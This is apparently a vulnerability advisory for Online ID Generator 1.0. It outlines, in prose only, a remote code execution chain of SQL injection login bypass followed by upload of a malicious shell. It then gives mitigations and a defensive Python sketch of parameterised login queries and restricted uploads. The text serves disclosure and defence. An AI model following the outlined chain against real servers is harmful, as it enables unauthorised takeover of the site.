vendor: Online ID Generator 1.0
by: nu11secur1ty
CVSS: 8.1 (CRITICAL)
Remote Code Execution (RCE)
CWE
Product Name: Online ID Generator 1.0
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested: None
2023
Online ID Generator 1.0 – Remote Code Execution (RCE)
The Online ID Generator 1.0 is vulnerable to remote code execution. It allows an attacker to bypass login using SQL injection and upload a malicious shell to execute arbitrary code on the server. By accessing the uploaded shell via a remote browser, the attacker can achieve remote code execution.
Mitigation:
To mitigate this vulnerability, the vendor should sanitize user input in the login form to prevent SQL injection. Additionally, the application should validate and restrict file uploads to prevent the execution of malicious code.
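The two mitigations above, sketched as an added example that is not the application's own code: a login lookup that binds user input as parameters, and an upload check that allow-lists image types and discards the client-supplied filename. Python and SQLite stand in for the application's stack, which the advisory does not show; the `users` table, its columns, the image-only allow-list and the sample account are assumptions.

```python
import hashlib
import hmac
import os
import secrets
import sqlite3

# Assumed allow-list: an ID generator only needs photo uploads.
MAGIC = {".png": b"\x89PNG\r\n\x1a\n", ".jpg": b"\xff\xd8\xff", ".jpeg": b"\xff\xd8\xff"}


def hash_pw(password, salt):
    """Salted PBKDF2 hash, so the database never holds plaintext passwords."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


def make_db():
    """In-memory database with one constructed account, for demonstration."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT PRIMARY KEY, salt BLOB, pw BLOB)")
    salt = os.urandom(16)
    db.execute("INSERT INTO users VALUES (?, ?, ?)",
               ("admin", salt, hash_pw("constructed-pass", salt)))
    return db


def login(db, username, password):
    """Look the user up with a bound parameter; input is never spliced into SQL."""
    row = db.execute("SELECT salt, pw FROM users WHERE username = ?",
                     (username,)).fetchone()
    if row is None:
        return False
    # The password is compared in application code, in constant time.
    return hmac.compare_digest(row[1], hash_pw(password, row[0]))


def safe_upload_name(filename, content):
    """Return a server-generated name for an allowed image, or None to reject."""
    ext = os.path.splitext(filename)[1].lower()
    if ext not in MAGIC:
        return None  # extension is not on the allow-list
    if not content.startswith(MAGIC[ext]):
        return None  # file content does not match the claimed type
    # The client-supplied name is dropped, so it cannot choose the stored path.
    return secrets.token_hex(16) + ext
```

Accepted files should also be stored in a directory that the web server serves as static content only, with script execution disabled for that path.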